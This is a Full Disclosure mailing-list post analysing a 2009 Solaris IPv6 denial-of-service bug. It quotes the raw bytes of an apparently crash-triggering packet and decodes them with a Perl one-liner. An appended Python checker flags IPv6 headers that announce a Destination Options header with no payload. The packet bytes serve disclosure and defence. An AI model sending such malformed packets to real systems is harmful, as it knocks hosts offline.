Full Disclosure mailing list archives

Re: Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)


From: GomoR <fd () gomor org>
Date: Fri, 30 Jan 2009 14:49:16 +0100

On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote:
[..]
unsigned char rawData[] =
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
[..]

% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw => 
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer
 => 'IPv6')->print."\n"'
Unable to unpack next layer, not yet implemented in layer: 0:IPv6
IPv6: version:6  trafficClass:0x0f  flowLabel:0xc5729  nextHeader:0x3c
IPv6: payloadLength:0  hopLimit:86
IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25  dst:fe80::20c:29ff:fef1:1ebb

So this vulnerability is due to an implementation flaw in the 
parsing of IPv6 Destination Header (0x3c). Of course, there is 
no IPv6 DH to parse :)

Does this vulnerability only exist when the next header is set to 0x3c,
or does it work with other values?

My guess is that we have a more general issue here.

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/               Research Engineer              |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+
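As an added example, not part of the original message or of Net::Frame: a small Python checker that decodes the 40-byte header quoted above and flags any Hdr-Ext-Len style extension header (Hop-by-Hop, Routing, Destination Options) that is announced by Next Header but for which the packet carries too little payload. The RFC 8200 minimum of 8 octets and the (Hdr Ext Len + 1) * 8 arithmetic are assumptions from the RFC, not from the thread.

```python
import ipaddress
import struct
from typing import Optional

# Constructed input: the 40-byte raw IPv6 header quoted from the thread,
# with no payload following it.
RAW_IPV6 = bytes.fromhex(
    "60fc572900003c56"
    "6f354072702f5258cc95127930bbbe25"
    "fe80000000000000020c29fffef11ebb"
)

# Extension headers laid out as Next Header, Hdr Ext Len (8-octet units,
# not counting the first 8 octets), ... (RFC 8200 section 4).
EXT_LEN_HEADERS = {0: "Hop-by-Hop Options", 43: "Routing", 60: "Destination Options"}


def parse_ipv6_header(raw: bytes) -> dict:
    """Decode the fixed 40-byte IPv6 header into its fields."""
    if len(raw) < 40:
        raise ValueError(f"need 40 bytes for an IPv6 header, got {len(raw)}")
    first_word, payload_len, next_hdr, hop_limit = struct.unpack("!IHBB", raw[:8])
    return {
        "version": first_word >> 28,
        "traffic_class": (first_word >> 20) & 0xFF,
        "flow_label": first_word & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": next_hdr,
        "hop_limit": hop_limit,
        "src": str(ipaddress.IPv6Address(raw[8:24])),
        "dst": str(ipaddress.IPv6Address(raw[24:40])),
    }


def check_extension_header(raw: bytes) -> Optional[str]:
    """Return a reason if the header announces an extension header that the
    packet cannot actually carry, else None. A stack that skips this check
    reads past the end of the packet, which is the failure mode of this thread."""
    hdr = parse_ipv6_header(raw)
    name = EXT_LEN_HEADERS.get(hdr["next_header"])
    if name is None:
        return None  # not an extension header type this checker models
    payload = raw[40:40 + hdr["payload_length"]]
    if hdr["payload_length"] < 8 or len(payload) < 8:
        return (f"{name} (0x{hdr['next_header']:02x}) announced, but payload "
                f"length is {hdr['payload_length']} (minimum 8)")
    ext_len = (payload[1] + 1) * 8  # on-wire length of this extension header
    if ext_len > len(payload):
        return f"{name} claims {ext_len} octets but only {len(payload)} are present"
    return None
```

Running `check_extension_header(RAW_IPV6)` on the quoted header reports a Destination Options header with payload length 0, which is exactly the "no DH to parse" situation above.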

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/